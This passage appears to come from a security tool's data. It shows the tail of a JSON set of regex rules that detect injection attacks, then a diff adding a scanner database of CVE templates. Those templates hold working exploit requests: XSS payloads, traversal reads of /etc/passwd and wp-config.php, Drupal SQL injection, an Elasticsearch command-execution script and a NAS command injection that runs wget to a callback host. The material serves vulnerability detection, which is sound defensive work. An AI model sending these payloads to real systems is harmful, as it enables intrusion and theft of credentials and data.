attempts","tags":["xss","csrf"],"impact":4},{"id":27,"rule":"(?:(?:vbs|vbscript|data):.*[,+])|(?:\\w+\\s*=\\W*(?!https?)\\w+:)|(jar:\\w+:)|(=\\s*\"?\\s*vbs(?:ript)?:)|(language\\s*=\\s?\"?\\s*vbs(?:ript)?)|on\\w+\\s*=\\*\\w+\\-\"?","description":"Detects data: URL injections, VBS injections and common URI schemes","tags":["xss","rfe"],"impact":5},{"id":28,"rule":"(?:firefoxurl:\\w+\\|)|(?:(?:file|res|telnet|nntp|news|mailto|chrome)\\s*:\\s*[%&#xu\\/]+)|(wyciwyg|firefoxurl\\s*:\\s*\\/\\s*\\/)","description":"Detects IE firefoxurl injections, cache poisoning attempts and local file inclusion/execution","tags":["xss","rfe","lfi","csrf"],"impact":5},{"id":29,"rule":"(?:binding\\s?=|moz-binding|behavior\\s?=)|(?:[\\s\\/]style\\s*=\\s*[-\\\\])","description":"Detects bindings and behavior injections","tags":["xss","csrf","rfe"],"impact":4},{"id":30,"rule":"(?:=\\s*\\w+\\s*\\+\\s*\")|(?:\\+=\\s*\\(\\s\")|(?:!+\\s*[\\d.,]+\\w?\\d*\\s*\\?)|(?:=\\s*\\[s*\\])|(?:\"\\s*\\+\\s*\")|(?:[^\\s]\\[\\s*\\d+\\s*\\]\\s*[;+])|(?:\"\\s*[&|]+\\s*\")|(?:\\/\\s*\\?\\s*\")|(?:\\/\\s*\\)\\s*\\[)|(?:\\d\\?.+:\\d)|(?:]\\s*\\[\\W*\\w)|(?:[^\\s]\\s*=\\s*\\/)","description":"Detects common XSS concatenation patterns 1/2","tags":["xss","csrf","id","rfe"],"impact":4},{"id":31,"rule":"(?:=\\s*\\d*\\.\\d*\\?\\d*\\.\\d*)|(?:[|&]{2,}\\s*\")|(?:!\\d+\\.\\d*\\?\")|(?:\\/:[\\w.]+,)|(?:=[\\d\\W\\s]*\\[[^]]+\\])|(?:\\?\\w+:\\w+)","description":"Detects common XSS concatenation patterns 2/2","tags":["xss","csrf","id","rfe"],"impact":4},{"id":32,"rule":"(?:[^\\w\\s=]on(?!g\\&gt;)\\w+[^=_+-]*=[^$]+(?:\\W|\\&gt;)?)","description":"Detects possible event handlers","tags":["xss","csrf"],"impact":4},{"id":33,"rule":"(?:\\<\\w*:?\\s(?:[^\\>]*)t(?!rong))|(?:\\<scri)|(<\\w+:\\w+)","description":"Detects obfuscated script tags and XML wrapped HTML","tags":["xss"],"impact":4},{"id":34,"rule":"(?:\\<\\/\\w+\\s\\w+)|(?:@(?:cc_on|set)[\\s@,\"=])","description":"Detects attributes in closing tags and conditional compilation tokens","tags":["xss","csrf"],"impact":4},{"id":35,"rule":"(?:--[^\\n]*$)|(?:\\<!-|-->)|(?:[^*]\\/\\*|\\*\\/[^*])|(?:(?:[\\W\\d]#|--|{)$)|(?:\\/{3,}.*$)|(?:<!\\[\\W)|(?:\\]!>)","description":"Detects common comment types","tags":["xss","csrf","id"],"impact":3},{"id":37,"rule":"(?:\\<base\\s+)|(?:<!(?:element|entity|\\[CDATA))","description":"Detects base href injections and XML entity injections","tags":["xss","csrf","id"],"impact":5},{"id":38,"rule":"(?:\\<[\\/]?(?:[i]?frame|applet|isindex|marquee|keygen|script|audio|video|input|button|textarea|style|base|body|meta|link|object|embed|param|plaintext|xm\\w+|image|im(?:g|port)))","description":"Detects possibly malicious html elements including some attributes","tags":["xss","csrf","id","rfe","lfi"],"impact":4},{"id":39,"rule":"(?:\\\\x[01fe][\\db-ce-f])|(?:%[01fe][\\db-ce-f])|(?:&#[01fe][\\db-ce-f])|(?:\\\\[01fe][\\db-ce-f])|(?:&#x[01fe][\\db-ce-f])","description":"Detects nullbytes and other dangerous characters","tags":["id","rfe","xss"],"impact":5},{"id":40,"rule":"(?:\\)\\s*when\\s*\\d+\\s*then)|(?:\"\\s*(?:#|--|{))|(?:\\/\\*!\\s?\\d+)|(?:ch(?:a)?r\\s*\\(\\s*\\d)|(?:(?:(n?and|x?or|not)\\s+|\\|\\||\\&\\&)\\s*\\w+\\()","description":"Detects MySQL comments, conditions and ch(a)r injections","tags":["sqli","id","lfi"],"impact":6},{"id":41,"rule":"(?:[\\s()]case\\s*\\()|(?:\\)\\s*like\\s*\\()|(?:having\\s*[^\\s]+\\s*[^\\w\\s])|(?:if\\s?\\([\\d\\w]\\s*[=<>~])","description":"Detects conditional SQL injection attempts","tags":["sqli","id","lfi"],"impact":6},{"id":42,"rule":"(?:\"\\s*or\\s*\"?\\d)|(?:\\\\x(?:23|27|3d))|(?:^.?\"$)|(?:(?:^[\"\\\\]*(?:[\\d\"]+|[^\"]+\"))+\\s*(?:n?and|x?or|not|\\|\\||\\&\\&)\\s*[\\w\"[+&!@(),.-])|(?:[^\\w\\s]\\w+\\s*[|-]\\s*\"\\s*\\w)|(?:@\\w+\\s+(and|or)\\s*[\"\\d]+)|(?:@[\\w-]+\\s(and|or)\\s*[^\\w\\s])|(?:[^\\w\\s:]\\s*\\d\\W+[^\\w\\s]\\s*\".)|(?:\\Winformation_schema|table_name\\W)","description":"Detects classic SQL injection probings 1/2","tags":["sqli","id","lfi"],"impact":6},{"id":43,"rule":"(?:\"\\s*\\*.+(?:or|id)\\W*\"\\d)|(?:\\^\")|(?:^[\\w\\s\"-]+(?<=and\\s)(?<=or\\s)(?<=xor\\s)(?<=nand\\s)(?<=not\\s)(?<=\\|\\|)(?<=\\&\\&)\\w+\\()|(?:\"[\\s\\d]*[^\\w\\s]+\\W*\\d\\W*.*[\"\\d])|(?:\"\\s*[^\\w\\s?]+\\s*[^\\w\\s]+\\s*\")|(?:\"\\s*[^\\w\\s]+\\s*[\\W\\d].*(?:#|--))|(?:\".*\\*\\s*\\d)|(?:\"\\s*or\\s[^\\d]+[\\w-]+.*\\d)|(?:[()*<>%+-][\\w-]+[^\\w\\s]+\"[^,])","description":"Detects classic SQL injection probings 2/2","tags":["sqli","id","lfi"],"impact":6},{"id":44,"rule":"(?:\\d\"\\s+\"\\s+\\d)|(?:^admin\\s*\"|(\\/\\*)+\"+\\s?(?:--|#|\\/\\*|{)?)|(?:\"\\s*or[\\w\\s-]+\\s*[+<>=(),-]\\s*[\\d\"])|(?:\"\\s*[^\\w\\s]?=\\s*\")|(?:\"\\W*[+=]+\\W*\")|(?:\"\\s*[!=|][\\d\\s!=+-]+.*[\"(].*$)|(?:\"\\s*[!=|][\\d\\s!=]+.*\\d+$)|(?:\"\\s*like\\W+[\\w\"(])|(?:\\sis\\s*0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:\"[<>~]+\")","description":"Detects basic SQL authentication bypass attempts 1/3","tags":["sqli","id","lfi"],"impact":7},{"id":45,"rule":"(?:union\\s*(?:all|distinct|[(!@]*)\\s*[([]*\\s*select)|(?:\\w+\\s+like\\s+\\\")|(?:like\\s*\"\\%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not\\s|\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:\"\\s*[^?\\w\\s=.,;)(]+\\s*[(@\"]*\\s*\\w+\\W+\\w)|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()","description":"Detects basic SQL authentication bypass attempts 2/3","tags":["sqli","id","lfi"],"impact":7},{"id":46,"rule":"(?:in\\s*\\(+\\s*select)|(?:(?:n?and|x?or|not\\s|\\|\\||\\&\\&)\\s+[\\s\\w+]+(?:regexp\\s*\\(|sounds\\s+like\\s*\"|[=\\d]+x))|(\"\\s*\\d\\s*(?:--|#))|(?:\"[%&<>^=]+\\d\\s*(=|or))|(?:\"\\W+[\\w+-]+\\s*=\\s*\\d\\W+\")|(?:\"\\s*is\\s*\\d.+\"?\\w)|(?:\"\\|?[\\w-]{3,}[^\\w\\s.,]+\")|(?:\"\\s*is\\s*[\\d.]+\\s*\\W.*\")","description":"Detects basic SQL authentication bypass attempts 3/3","tags":["sqli","id","lfi"],"impact":7},{"id":47,"rule":"(?:[\\d\\W]\\s+as\\s*[\"\\w]+\\s*from)|(?:^[\\W\\d]+\\s*(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s+(?:(?:group_)concat|char|load_file)\\s?\\(?)|(?:end\\s*\\);)|(\"\\s+regexp\\W)|(?:[\\s(]load_file\\s*\\()","description":"Detects concatenated basic SQL injection and SQLLFI attempts","tags":["sqli","id","lfi"],"impact":5},{"id":48,"rule":"(?:@.+=\\s*\\(\\s*select)|(?:\\d+\\s*or\\s*\\d+\\s*[\\-+])|(?:\\/\\w+;?\\s+(?:having|and|or|select)\\W)|(?:\\d\\s+group\\s+by.+\\()|(?:(?:;|#|--)\\s*(?:drop|alter))|(?:(?:;|#|--)\\s*(?:update|insert)\\s*\\w{2,})|(?:[^\\w]SET\\s*@\\w+)|(?:(?:n?and|x?or|not\\s|\\|\\||\\&\\&)[\\s(]+\\w+[\\s)]*[!=+]+[\\s\\d]*[\"=()])","description":"Detects chained SQL injection attempts 1/2","tags":["sqli","id"],"impact":6},{"id":49,"rule":"(?:\"\\s+and\\s*=\\W)|(?:\\(\\s*select\\s*\\w+\\s*\\()|(?:\\*\\/from)|(?:\\+\\s*\\d+\\s*\\+\\s*@)|(?:\\w\"\\s*(?:[-+=|@]+\\s*)+[\\d(])|(?:coalesce\\s*\\(|@@\\w+\\s*[^\\w\\s])|(?:\\W!+\"\\w)|(?:\";\\s*(?:if|while|begin))|(?:\"[\\s\\d]+=\\s*\\d)|(?:order\\s+by\\s+if\\w*\\s*\\()|(?:[\\s(]+case\\d*\\W.+[tw]hen[\\s(])","description":"Detects chained SQL injection attempts 2/2","tags":["sqli","id"],"impact":6},{"id":50,"rule":"(?:(select|;)\\s+(?:benchmark|if|sleep)\\s*?\\(\\s*\\(?\\s*\\w+)","description":"Detects SQL benchmark and sleep injection attempts including conditional queries","tags":["sqli","id"],"impact":4},{"id":51,"rule":"(?:create\\s+function\\s+\\w+\\s+returns)|(?:;\\s*(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s*[\\[(]?\\w{2,})","description":"Detects MySQL UDF injection and other data/structure manipulation attempts","tags":["sqli","id"],"impact":6},{"id":52,"rule":"(?:alter\\s*\\w+.*character\\s+set\\s+\\w+)|(\";\\s*waitfor\\s+time\\s+\")|(?:\";.*:\\s*goto)","description":"Detects MySQL charset switch and MSSQL DoS attempts","tags":["sqli","id"],"impact":6},{"id":53,"rule":"(?:procedure\\s+analyse\\s*\\()|(?:;\\s*(declare|open)\\s+[\\w-]+)|(?:create\\s+(procedure|function)\\s*\\w+\\s*\\(\\s*\\)\\s*-)|(?:declare[^\\w]+[@#]\\s*\\w+)|(exec\\s*\\(\\s*@)","description":"Detects MySQL and PostgreSQL stored procedure/function injections","tags":["sqli","id"],"impact":7},{"id":54,"rule":"(?:select\\s*pg_sleep)|(?:waitfor\\s*delay\\s?\"+\\s?\\d)|(?:;\\s*shutdown\\s*(?:;|--|#|\\/\\*|{))","description":"Detects Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts","tags":["sqli","id"],"impact":5},{"id":55,"rule":"(?:\\sexec\\s+xp_cmdshell)|(?:\"\\s*!\\s*[\"\\w])|(?:from\\W+information_schema\\W)|(?:(?:(?:current_)?user|database|schema|connection_id)\\s*\\([^\\)]*)|(?:\";?\\s*(?:select|union|having)\\s*[^\\s])|(?:\\wiif\\s*\\()|(?:exec\\s+master\\.)|(?:union\\sselect\\s@)|(?:union[\\w(\\s]*select)|(?:select.*\\w?user\\()|(?:into[\\s+]+(?:dump|out)file\\s*\")","description":"Detects MSSQL code execution and information gathering attempts","tags":["sqli","id"],"impact":5},{"id":56,"rule":"(?:merge.*using\\s*\\()|(execute\\s*immediate\\s*\")|(?:\\W+\\d*\\s*having\\s*[^\\s\\-])|(?:match\\s*[\\w(),+-]+\\s*against\\s*\\()","description":"Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections","tags":["sqli","id"],"impact":5},{"id":57,"rule":"(?:,.*[)\\da-f\"]\"(?:\".*\"|\\Z|[^\"]+))|(?:\\Wselect.+\\W*from)|((?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s*\\(\\s*space\\s*\\()","description":"Detects MySQL comment-/space-obfuscated injections and backtick termination","tags":["sqli","id"],"impact":5},{"id":58,"rule":"(?:@[\\w-]+\\s*\\()|(?:]\\s*\\(\\s*[\"!]\\s*\\w)|(?:<[?%](?:php)?.*(?:[?%]>)?)|(?:;[\\s\\w|]*\\$\\w+\\s*=)|(?:\\$\\w+\\s*=(?:(?:\\s*\\$?\\w+\\s*[(;])|\\s*\".*\"))|(?:;\\s*\\{\\W*\\w+\\s*\\()","description":"Detects code injection attempts 1/3","tags":["id","rfe","lfi"],"impact":7},{"id":59,"rule":"(?:(?:[;]+|(<[?%](?:php)?)).*(?:define|eval|file_get_contents|include|require|require_once|set|shell_exec|phpinfo|system|passthru|preg_\\w+|execute)\\s*[\"(@])","description":"Detects code injection attempts 2/3","tags":["id","rfe","lfi"],"impact":7},{"id":60,"rule":"(?:(?:[;]+|(<[?%](?:php)?)).*[^\\w](?:echo|print|print_r|var_dump|[fp]open))|(?:;\\s*rm\\s+-\\w+\\s+)|(?:;.*{.*\\$\\w+\\s*=)|(?:\\$\\w+\\s*\\[\\]\\s*=\\s*)","description":"Detects code injection attempts 3/3","tags":["id","rfe","lfi"],"impact":7},{"id":62,"rule":"(?:function[^(]*\\([^)]*\\))|(?:(?:delete|void|throw|instanceof|new|typeof)[^\\w.]+\\w+\\s*[([])|([)\\]]\\s*\\.\\s*\\w+\\s*=)|(?:\\(\\s*new\\s+\\w+\\s*\\)\\.)","description":"Detects common function declarations and special JS operators","tags":["id","rfe","lfi"],"impact":5},{"id":63,"rule":"(?:[\\w.-]+@[\\w.-]+%(?:[01][\\db-ce-f])+\\w+:)","description":"Detects common mail header injections","tags":["id","spam"],"impact":5},{"id":64,"rule":"(?:\\.pl\\?\\w+=\\w?\\|\\w+;)|(?:\\|\\(\\w+=\\*)|(?:\\*\\s*\\)+\\s*;)","description":"Detects perl echo shellcode injection and LDAP vectors","tags":["lfi","rfe"],"impact":5},{"id":65,"rule":"(?:(^|\\W)const\\s+[\\w\\-]+\\s*=)|(?:(?:do|for|while)\\s*\\([^;]+;+\\))|(?:(?:^|\\W)on\\w+\\s*=[\\w\\W]*(?:on\\w+|alert|eval|print|confirm|prompt))|(?:groups=\\d+\\(\\w+\\))|(?:(.)\\1{128,})","description":"Detects basic XSS DoS attempts","tags":["rfe","dos"],"impact":5},{"id":67,"rule":"(?:\\({2,}\\+{2,}:{2,})|(?:\\({2,}\\+{2,}:+)|(?:\\({3,}\\++:{2,})|(?:\\$\\[!!!\\])","description":"Detects unknown attack vectors based on PHPIDS Centrifuge detection","tags":["xss","csrf","id","rfe","lfi"],"impact":7},{"id":68,"rule":"(?:[\\s\\/\"]+[-\\w\\/\\\\\\*]+\\s*=.+(?:\\/\\s*>))","description":"Finds attribute breaking injections including obfuscated attributes","tags":["xss","csrf"],"impact":4},{"id":69,"rule":"(?:(?:msgbox|eval)\\s*\\+|(?:language\\s*=\\*vbscript))","description":"Finds basic VBScript injection attempts","tags":["xss","csrf"],"impact":4},{"id":70,"rule":"(?:\\[\\$(?:ne|eq|lte?|gte?|n?in|mod|all|size|exists|type|slice|or)\\])","description":"Finds basic MongoDB SQL injection attempts","tags":["sqli"],"impact":4},{"id":71,"rule":"(?:[\\s\\d\\/\"]+(?:on\\w+|style|poster|background)=[$\"\\w])|(?:-type\\s*:\\s*multipart)","description":"finds malicious attribute injection attempts and MHTML attacks","tags":["xss","csrf"],"impact":6},{"id":72,"rule":"(?:(sleep\\((\\s*)(\\d*)(\\s*)\\)|benchmark\\((.*)\\,(.*)\\)))","description":"Detects blind sqli tests using sleep() or benchmark().","tags":["sqli","id"],"impact":4},{"id":73,"rule":"(?:(\\%SYSTEMROOT\\%))","description":"An attacker is trying to locate a file to read or write.","tags":["files","id"],"impact":4},{"id":75,"rule":"(?:(((.*)\\%[c|d|i|e|f|g|o|s|u|x|p|n]){8}))","description":"Looking for a format string attack","tags":["format string"],"impact":4},{"id":76,"rule":"(?:(union(.*)select(.*)from))","description":"Looking for basic sql injection. Common attack string for mysql, oracle and others.","tags":["sqli","id"],"impact":3},{"id":77,"rule":"(?:^(-0000023456|4294967295|4294967296|2147483648|2147483647|0000012345|-2147483648|-2147483649|0000023456|2.2250738585072007e-308|1e309)$)","description":"Looking for intiger overflow attacks, these are taken from skipfish, except 2.2250738585072007e-308 is the \"magic number\" crash","tags":["sqli","id"],"impact":3},{"id":78,"rule":"(?:%23.*?%0A)","description":"Detects SQL comment filter evasion","tags":["format string"],"impact":10},{"id":79,"rule":"((burpcollaborator|pipedream)\\.net|(canarytokens|requestrepo)\\.com|oast\\.(online|(liv|sit|m)e|fun|pro)|\\.ngrok(\\-free\\.(app|dev)|\\.((app|io)|dev)))","description":"Detects out-of-band (OOB) interaction or Server-Side Request Forgery (SSRF) attack attempts","tags":["ssrf","oob"],"impact":10},{"id":80,"rule":"(?i)(?:on(?:webkitanimationiteration|(?:(?:webkitanimation|(?:select|drag))s|t(?:ransition|ouch)s)tart|(?:webkit(?:transi|anima)tione|t(?:ransition|ouch)e|scrolle)nd|(?:beforescriptexecut|afterscriptexecut|(?:p(?:ointerrawupda|(?:opsta|as))|timeupda)t|b(?:eforetoggl|ounc)|(?:pointer|drag)leav|(?:pointer|touch)mov|mouse(?:lea|mo)v|pa(?:gehid|us)|resiz|clos)e|(?:mozfullscreen|fullscreen|(?:selec|dura)tion|hash|cue)change|unhandledrejection|a(?:nimation(?:iteration|cancel|start|end)|fterprint|uxclick)|transitioncancel|toggle\\(popover\\)|loaded(?:meta)?data|(?:canplaythroug|searc)h|(?:transitionru|(?:pointer|key)dow|mousedow|(?:focus|beg)i)n|pointerenter|(?:beforeunloa|invali|(?:seek|end)e|unloa)d|volumechange|c(?:(?:ontextmenu|ut)|opy)|(?:pointerov|drag(?:ent|ov))er|(?:(?:beforeinp|focuso)u|beforeprin|pointerou|beforecu|mouseou|submi|re(?:pea|se)|inpu)t|beforecopy|mouse(?:enter|over|up)|(?:mouse)?wheel|ratechange|(?:pointeru|keyu|dro)p|pageshow|progress|keypress|dblclick|canplay|dragend|playing|s(?:eeking|how)|message|s(?:croll|elect)|toggle|finish|change|focus|(?:erro|blu)r|click|start|drag|load|play|end))\\s*?=","description":"Detects common event attributes and properties","tags":["xss","csrf","id","rfe"],"impact":6}]}
diff --git a/db/cves.json b/db/cves.json
new file mode 100644
index 00000000..5a85481b
--- /dev/null
+++ b/db/cves.json
@@ -0,0 +1 @@
+{"templates":[{"id":"CVE-2002-1131","info":{"name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search","{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search","{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8676","info":{"name":"Simple Online Planning Tool <1.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2908","info":{"name":"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3206","info":{"name":"Seagate BlackArmor NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2014-2383","info":{"name":"Dompdf < v0.6.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/dompdf.php?input_file=php://filter/resource=/etc/passwd","/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd","/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/pdf","filename=\"dompdf_out.pdf\""],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4535","info":{"name":"Import Legacy Media <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/import-legacy-media/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3120","info":{"name":"ElasticSearch v1.1.1/1.2 RCE","severity":"medium"},"requests":[{"raw":["POST /_search?pretty HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n    \"size\": 1,\n    \"query\": {\n      \"filtered\": {\n        \"query\": {\n          \"match_all\": {\n          }\n        }\n      }\n    },\n    \"script_fields\": {\n        \"command\": {\n            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"\n        }\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9119","info":{"name":"WordPress DB Backup <=4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5258","info":{"name":"webEdition 6.3.8.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3704","info":{"name":"Drupal SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/?q=node&destination=node"],"body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PDOException","{{md5({{num}})}}"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2014-4561","info":{"name":"Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ultimate Weather","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-10037","info":{"name":"DomPHP 0.83 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2321","info":{"name":"ZTE Cable Modem Web Shell","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_shell_cmd.gch"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please input shell command","ZTE Corporation. All rights reserved"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4940","info":{"name":"WordPress Plugin Tera Charts - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5111","info":{"name":"Fonality trixbox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4550","info":{"name":"Shortcode Ninja <= 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/shortcode-ninja/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9608","info":{"name":"Netsweeper 4.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["webadminU=","webadmin="],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4942","info":{"name":"WordPress EasyCart <2.0.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2014-9180","info":{"name":"Eleanor CMS - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/go.php?http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-6271","info":{"name":"ShellShock - Remote Code 